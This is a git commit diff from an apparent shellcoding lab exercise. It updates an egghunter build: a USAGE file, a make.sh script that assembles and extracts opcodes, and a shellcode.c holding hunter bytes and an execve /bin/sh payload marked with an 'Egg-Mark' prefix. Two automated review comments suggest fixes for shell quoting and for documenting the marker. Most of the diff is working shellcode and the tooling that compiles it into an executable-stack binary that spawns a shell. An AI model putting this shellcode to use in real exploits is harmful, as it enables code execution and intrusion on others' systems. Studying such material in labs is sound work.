minor updates
parent
eea59770f7
commit
7a26aee784
16
exam3/USAGE
16
exam3/USAGE
@ -9,25 +9,23 @@ exam3$ ln -svf payload-execve-stack.nasm payload.nasm
|
|||||||
|
|
||||||
2. Compile the shellcode with a custom "egg" (must be 8 bytes in length)
|
2. Compile the shellcode with a custom "egg" (must be 8 bytes in length)
|
||||||
|
|
||||||
exam3$ ./make.sh "cust.egg"
|
exam3$ ./make.sh
|
||||||
[I] Using custom EGG mark: cust.egg
|
[I] Argument not specified. Using default EGG mark.
|
||||||
[+] Compiling payload.nasm ...
|
[+] Compiling payload.nasm ...
|
||||||
[+] Compiling egg.nasm ...
|
|
||||||
[+] Compiling hunter.nasm ...
|
[+] Compiling hunter.nasm ...
|
||||||
[+] Extracting EGG code from egg ...
|
|
||||||
[+] Extracting PAYLOAD code from payload ...
|
[+] Extracting PAYLOAD code from payload ...
|
||||||
|
[+] Adding EGG mark to PAYLOAD ...
|
||||||
[+] Checking PAYLOAD code for NULLs ...
|
[+] Checking PAYLOAD code for NULLs ...
|
||||||
[+] Extracting HUNTER code from hunter ...
|
[+] Extracting HUNTER code from hunter ...
|
||||||
[+] Checking HUNTER code for NULLs ...
|
[+] Checking HUNTER code for NULLs ...
|
||||||
[+] Compiling shellcode.c ...
|
[+] Compiling shellcode.c ...
|
||||||
-rwx------. 1 arno arno 5108 Mar 27 15:00 ./shellcode
|
-rwx------. 1 arno arno 5100 Mar 27 16:46 ./shellcode
|
||||||
[+] All done!
|
[+] All done!
|
||||||
|
|
||||||
|
|
||||||
3. Run the shellcode
|
3. Run the shellcode
|
||||||
|
|
||||||
exam3$ ./shellcode
|
exam3$ ./shellcode
|
||||||
Hunter Length: 37
|
Hunter Length: 29
|
||||||
Payload Length: 43
|
Payload Length: 36
|
||||||
sh-4.1$
|
sh-4.1$ exit
|
||||||
|
|
||||||
|
@ -1,32 +0,0 @@
|
|||||||
; This program is free software: you can redistribute it and/or modify
|
|
||||||
; it under the terms of the GNU General Public License as published by
|
|
||||||
; the Free Software Foundation, either version 3 of the License, or
|
|
||||||
; (at your option) any later version.
|
|
||||||
;
|
|
||||||
; This program is distributed in the hope that it will be useful,
|
|
||||||
; but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
||||||
; GNU General Public License for more details.
|
|
||||||
;
|
|
||||||
; You should have received a copy of the GNU General Public License
|
|
||||||
; along with this program. If not, see <http://www.gnu.org/licenses/>.
|
|
||||||
;
|
|
||||||
;
|
|
||||||
; Filename: egg.nasm
|
|
||||||
; Author: Andrey Arapov <andrey.arapov@gmail.com>
|
|
||||||
; 2013 March
|
|
||||||
;
|
|
||||||
;
|
|
||||||
|
|
||||||
section .text
|
|
||||||
global _start
|
|
||||||
|
|
||||||
_start:
|
|
||||||
;db "Egg-Mark" ; QWORD egg marker - will be appended in shellcode.c after running 'make.sh'
|
|
||||||
|
|
||||||
; loop counter = 8
|
|
||||||
xor ecx, ecx
|
|
||||||
mov cl, 8
|
|
||||||
decloop:
|
|
||||||
dec eax
|
|
||||||
loop decloop
|
|
@ -32,27 +32,21 @@ NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g'))
|
|||||||
EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g')
|
EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g')
|
||||||
|
|
||||||
# Cleanup
|
# Cleanup
|
||||||
rm -f shellcode payload.o payload egg.o egg hunter.o hunter
|
rm -f shellcode payload.o payload hunter.o hunter
|
||||||
|
|
||||||
echo " [+] Compiling payload.nasm ..."
|
echo " [+] Compiling payload.nasm ..."
|
||||||
nasm -f elf32 -o payload.o payload.nasm
|
nasm -f elf32 -o payload.o payload.nasm
|
||||||
ld -m elf_i386 -o payload payload.o
|
ld -m elf_i386 -o payload payload.o
|
||||||
|
|
||||||
echo " [+] Compiling egg.nasm ..."
|
|
||||||
nasm -f elf32 -o egg.o egg.nasm
|
|
||||||
ld -m elf_i386 -o egg egg.o
|
|
||||||
|
|
||||||
echo " [+] Compiling hunter.nasm ..."
|
echo " [+] Compiling hunter.nasm ..."
|
||||||
nasm -f elf32 -o hunter.o hunter.nasm
|
nasm -f elf32 -o hunter.o hunter.nasm
|
||||||
ld -m elf_i386 -o hunter hunter.o
|
ld -m elf_i386 -o hunter hunter.o
|
||||||
|
|
||||||
echo " [+] Extracting EGG code from egg ..."
|
|
||||||
EGGCODE=$(objdump -d ./egg |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s)
|
|
||||||
|
|
||||||
echo " [+] Extracting PAYLOAD code from payload ..."
|
echo " [+] Extracting PAYLOAD code from payload ..."
|
||||||
PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s)
|
PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s)
|
||||||
|
|
||||||
FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${EGGCODE}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g')
|
echo " [+] Adding EGG mark to PAYLOAD ..."
|
||||||
|
FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g')
|
||||||
|
|
||||||
echo " [+] Checking PAYLOAD code for NULLs ..."
|
echo " [+] Checking PAYLOAD code for NULLs ..."
|
||||||
if [[ $FULL_PAYLOADCODE == *00* ]]; then
|
if [[ $FULL_PAYLOADCODE == *00* ]]; then
|
||||||
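Review bot: The added `FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g')` line leaves the expansion unquoted inside `echo -n`, and EGGMARK is built on the first context line of this hunk from an equally unquoted `$ARG1`, so a marker containing whitespace or glob characters is word-split or expanded before `od` and the resulting hex string no longer reflects the bytes the user supplied. The whole echo/sed/sed pipeline reduces to `FULL_PAYLOADCODE=$(printf '"%s"' "${EGGMARK}${PAYLOADCODE}")`, which is quoted and produces the same `"..."` string. Since the marker is now prepended to the payload here rather than coming from the removed egg.nasm, a guard such as `: "${EGGMARK:?EGG mark must be set}"` just before the assignment would stop an empty marker from silently producing a payload the hunter presumably cannot locate; the default-marker assignment that USAGE mentions is outside this hunk. The cleanup list `rm -f shellcode payload.o payload hunter.o hunter` is now repeated by hand in this hunk and again in the `@ -129,7 +123,7` hunk below; one variable holding the intermediate file names would keep the two lists from drifting.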
@ -129,7 +123,7 @@ echo " [+] Compiling shellcode.c ..."
|
|||||||
gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
|
gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
|
||||||
|
|
||||||
# Cleanup
|
# Cleanup
|
||||||
rm -f payload.o payload egg.o egg hunter.o hunter
|
rm -f payload.o payload hunter.o hunter
|
||||||
|
|
||||||
ls -la ./shellcode
|
ls -la ./shellcode
|
||||||
|
|
||||||
|
@ -5,7 +5,7 @@ unsigned char hunter[] = "\xeb\x16\x58\x40\x81\x78\xf8\x45\x67\x67\x2d\x75\xf6\x
|
|||||||
|
|
||||||
unsigned char garbage1[] = "Just some garbage here...";
|
unsigned char garbage1[] = "Just some garbage here...";
|
||||||
|
|
||||||
unsigned char payload[] = "\x45\x67\x67\x2d\x4d\x61\x72\x6b\x31\xc9\xb1\x08\x48\xe2\xfd\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80";
|
unsigned char payload[] = "\x45\x67\x67\x2d\x4d\x61\x72\x6b\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80";
|
||||||
|
|
||||||
unsigned char garbage2[] = "And some garbage there...";
|
unsigned char garbage2[] = "And some garbage there...";
|
||||||
|
|
||||||
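Review bot: The regenerated `payload[]` on the new side now begins with the 8-byte egg marker `\x45\x67\x67\x2d\x4d\x61\x72\x6b` ("Egg-Mark") followed directly by the payload code, but nothing in the file records that the array is generated or that its first eight bytes are the marker, so a later hand edit of either array could split the two apart. A comment above the declaration would capture it: `/* generated by make.sh: first 8 bytes are the egg marker ("Egg-Mark"), the rest is the payload code */`. The `hunter[]` declaration in the hunk header appears to compare against the same marker bytes, though that declaration lies outside the shown lines, so the coupling should be confirmed against hunter.nasm before wording the comment as a hard requirement.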
|